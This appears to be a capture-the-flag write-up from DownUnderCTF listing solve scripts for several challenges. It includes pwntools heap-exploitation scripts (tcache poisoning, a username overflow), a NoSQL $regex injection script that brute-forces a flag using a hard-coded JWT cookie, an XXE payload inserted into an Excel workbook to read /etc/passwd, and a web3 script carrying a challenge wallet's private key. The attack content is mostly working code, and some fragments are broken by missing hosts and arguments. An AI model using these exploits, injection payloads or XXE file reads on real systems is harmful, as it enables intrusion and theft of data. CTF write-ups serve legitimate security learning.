solve.pyfrom pwn import * elf = ELF("./p0ison3d") libc = ELF("./") io = remote("", 30024) def add_note(idx: int, data: bytes): io.sendlineafter(b"choice:\n", b"1") io.sendlineafter(b"index:\n", str(idx).encode()) io.sendlineafter(b"data:\n", data) def edit_note(idx: int, data: bytes): io.sendlineafter(b"choice:\n", b"3") io.sendlineafter(b"index:\n", str(idx).encode()) io.sendlineafter(b"data:\n", data) def del_note(idx: int): io.sendlineafter(b"choice:\n", b"4") io.sendlineafter(b"index:\n", str(idx).encode()) add_note(0, b"AAAA") add_note(1, b"BBBB") add_note(2, b"CCCC") del_note(2) del_note(1) edit_note(0, b"A" * 0x88 + p64(0x91) + p64(["puts"])) add_note(1, p64(elf.symbols["win"])) add_note(2, p64(elf.symbols["win"])) io.interactive()
121 solves
solve.pyfrom pwn import * io = remote("", 30025) io.sendlineafter(b"> ", b"1") io.sendlineafter(b"Username length: ", b"0") io.sendlineafter(b"Username: ", b"A" * 20 + p64(0x20021) + p64(0x1337) + b"A" * 8) io.sendlineafter(b"> ", b"1") io.sendlineafter(b"Username length: ", b"0") io.sendlineafter(b"Username: ", b"B" * 8) io.sendlineafter(b"> ", b"2") io.sendlineafter(b"Username: ", b"B" * 8) io.interactive()
60 solves
solve.pyimport requests from tqdm import tqdm url_template = "[$regex]=^{flag}" flag = "DUCTF" for _ in range(100): for i in tqdm(range(32, 127)): c = chr(i) if c in "#&*+.; ?[]()": continue url = url_template.format(flag=flag+c) res = requests.get(url, cookies={"jwt": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2MzJlNmU0NTdiMDNiNjJhM2VhNzNiMjIiLCJpYXQiOjE2NjM5ODcyNzAsImV4cCI6MTY2NDU5MjA3MH0.pOPiuRekdydbxKykr4zNRu7vwHhZeCsGrrP0FXR1fGw"}) if "You are not the owner of this note!" in res.text: flag += c print(flag) break
I modified xl/workbook.xml.
Add it at the beginning:
<!DOCTYPE data [ <!ENTITY secretData SYSTEM "file:///etc/passwd"> ]>
Then the following
<x15ac:absPath url="/Users/Shared/" xmlns:x15ac=""/>
is modified to
<x15ac:absPath url="/Users/Shared/" xmlns:x15ac="">&secretData;</x15ac:absPath>
Solve Me
194 solves
(I didn't solve it during the competition)
solve.pyfrom web3 import Web3, HTTPProvider # {"player_wallet":{"address":"0x858298422603353F539dB6885519450cF0145D1f","private_key":"0x2a58e449ea87976a5ad3b86da6b13af7f624eda31d379704fe681ac7a207c186","balance":"2.0 ETH"},"contract_address":[{"address":"0x6E4198C61C75D1B4D1cbcd00707aAC7d76867cF8","name":"SolveMe.sol"}]} private_key = "0x2a58e449ea87976a5ad3b86da6b13af7f624eda31d379704fe681ac7a207c186" address = "0x6E4198C61C75D1B4D1cbcd00707aAC7d76867cF8" w3 = Web3(HTTPProvider("")) account = w3.eth.account.from_key(private_key) # made by abi = [ { "inputs": [], "name": "isSolved", "outputs": [ { "internalType": "bool", "name": "", "type": "bool" } ], "stateMutability": "view", "type": "function" }, { "inputs": [], "name": "solveChallenge", "outputs": [], "stateMutability": "nonpayable", "type": "function" } ] contract = w3.eth.contract(address=address, abi=abi) def get_nonce(addr): return w3.eth.get_transaction_count(addr) def get_transaction_body(addr): return { "nonce": get_nonce(addr), "gas": 1239137, "gasPrice": 21000000000, "value": 0, "from": addr, } def send_transaction(addr, func_name: str): transaction_body = get_transaction_body(addr) function_call = contract.functions[func_name]().buildTransaction(transaction_body) signed_transaction = w3.eth.account.sign_transaction(function_call, private_key) result = w3.eth.send_raw_transaction(signed_transaction.rawTransaction) tx_hash = w3.eth.wait_for_transaction_receipt(result) return tx_hash res = send_transaction(account.address, "solveChallenge")